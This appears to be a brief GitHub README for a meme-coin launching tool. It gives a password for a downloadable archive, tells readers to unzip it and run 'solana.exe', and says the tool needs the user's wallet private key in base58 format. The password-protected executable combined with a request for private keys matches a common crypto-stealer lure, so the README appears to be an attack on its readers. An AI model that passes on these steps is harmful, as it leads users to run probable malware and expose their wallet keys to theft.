smokingjapandev/how-to-launch-a-meme-coin/README.md

 ## The archive password is ***S0Lbot!bysmoke***
  *Download the archive, unzip it and launch the "solana.exe" file

+# Creation

+To create a token, you need to import the wallet's private key in base58 format, which should have the right amount of solana to pay off the fee

 # Features

 + Token name customization